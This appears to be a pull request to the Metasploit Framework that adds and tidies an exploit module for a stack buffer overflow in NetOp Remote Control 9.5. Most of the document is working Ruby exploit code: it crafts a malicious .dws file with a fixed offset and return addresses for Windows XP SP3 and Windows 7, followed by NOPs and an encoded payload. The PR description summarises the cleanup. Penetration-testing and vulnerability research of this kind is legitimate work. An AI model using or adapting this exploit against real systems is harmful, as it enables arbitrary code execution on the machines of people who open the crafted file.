### PR TITLE
Add Chap0's NetOp exploit module

### DIFF
--- a/modules/exploits/windows/fileformat/netop.rb
+++ b/modules/exploits/windows/fileformat/netop.rb
@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+#   http://metasploit.com/framework/
 ##
 
 require 'msf/core'
@@ -14,19 +14,18 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		=> 'NetOp Remote Control 9.5 Buffer Overflow',
-			'Description'	=> %q{
+			'Name'           => 'NetOp Remote Control Client 9.5 Buffer Overflow',
+			'Description'    => %q{
 					This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.
-				When opeining a .dws file containing a specially crafted string longer then 520 
-				characters will allow an attacker to execute arbitraty code.
+				When opening a .dws file containing a specially crafted string longer then 520 
+				characters will allow an attacker to execute arbitrary code.
 			},
-			'License'		=> MSF_LICENSE,
-			'Author'		=>
+			'License'        => MSF_LICENSE,
+			'Author'         =>
 				[
-					'Ruben Alejandro "chap0"',	
-					
+					'Ruben Alejandro "chap0"',
 				],
-			'References'	=>
+			'References'     =>
 				[
 					[ 'OSVDB', '72291' ],
 					[ 'URL', 'http://www.exploit-db.com/exploits/17223/' ]
@@ -34,52 +33,43 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DefaultOptions' =>
 				{
 					'ExitFunction' => 'process',
-					'DisablePayloadHandler' => 'true',
+					'DisablePayloadHandler' => 'true'
 				},
-			'Platform'	=> 'win',
-			'Payload'	=>
+			'Platform'       => 'win',
+			'Payload'        =>
 				{
 					'Space' => 2000,
 					'BadChars' => "\x00\x0a\x0d",
 					'DisableNops' => true,
-					'StackAdjustment' => -3500,
+					'StackAdjustment' => -3500
 				},
-
-			'Targets'		=>
+			'Targets'        =>
 				[
 					[ 'Windows XP SP3',
 						{
-							'Ret'    => 0x223159fc,		# push esp #  ret  - NFMNT.dll
+							'Ret' => 0x20d6c32c,  # push esp #  ret  - nrp.DLL
 							'Offset' => 524
 						}
-					],
-				
-					[ 'Windows 7',
-						{
-							'Ret'	 => 0x20d6c32c,		# push esp #  ret  - nrp.DLL
-							'Offset' => 524
-						}
-					],
+					]
 				],
-			'Privileged'	=> false,
-			'DisclosureDate'=> 'Apr 28 2011',
-			'DefaultTarget'	=> 0))
+			'Privileged'     => false,
+			'DisclosureDate' => 'Apr 28 2011',
+			'DefaultTarget'  => 0))
 
 		register_options(
 			[
-				OptString.new('FILENAME', [ false, 'The file name.', 'msf.dws']),
+				OptString.new('FILENAME', [ true, 'The file name.', 'msf.dws']),
 			], self.class)
 
 	end
 
 	def exploit
-
-		buffer =  rand_text(target['Offset'])	
-		buffer << [target.ret].pack('V')	
+		buffer =  rand_text(target['Offset'])
+		buffer << [target.ret].pack('V')
 		buffer << make_nops(30)
 		buffer << payload.encoded
 
 		file_create(buffer)
-
 	end
+
 end

--- a/modules/exploits/windows/fileformat/netop.rb
+++ b/modules/exploits/windows/fileformat/netop.rb
@@ -1,0 +1,85 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'NetOp Remote Control 9.5 Buffer Overflow',
+			'Description'	=> %q{
+					This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.
+				When opeining a .dws file containing a specially crafted string longer then 520 
+				characters will allow an attacker to execute arbitraty code.
+			},
+			'License'		=> MSF_LICENSE,
+			'Author'		=>
+				[
+					'Ruben Alejandro "chap0"',	
+					
+				],
+			'References'	=>
+				[
+					[ 'OSVDB', '72291' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/17223/' ]
+				],
+			'DefaultOptions' =>
+				{
+					'ExitFunction' => 'process',
+					'DisablePayloadHandler' => 'true',
+				},
+			'Platform'	=> 'win',
+			'Payload'	=>
+				{
+					'Space' => 2000,
+					'BadChars' => "\x00\x0a\x0d",
+					'DisableNops' => true,
+					'StackAdjustment' => -3500,
+				},
+
+			'Targets'		=>
+				[
+					[ 'Windows XP SP3',
+						{
+							'Ret'    => 0x223159fc,		# push esp #  ret  - NFMNT.dll
+							'Offset' => 524
+						}
+					],
+				
+					[ 'Windows 7',
+						{
+							'Ret'	 => 0x20d6c32c,		# push esp #  ret  - nrp.DLL
+							'Offset' => 524
+						}
+					],
+				],
+			'Privileged'	=> false,
+			'DisclosureDate'=> 'Apr 28 2011',
+			'DefaultTarget'	=> 0))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ false, 'The file name.', 'msf.dws']),
+			], self.class)
+
+	end
+
+	def exploit
+
+		buffer =  rand_text(target['Offset'])	
+		buffer << [target.ret].pack('V')	
+		buffer << make_nops(30)
+		buffer << payload.encoded
+
+		file_create(buffer)
+
+	end
+end


### PR DESCRIPTION
This is the vetted version of chap0's NetOp exploit. Changes include:
- Typos corrections
- Whitespace cleanup
- Removed Win 7 target due to reliability issues
- Different target.ret for Win 3 target for reliability

Reference:
#293
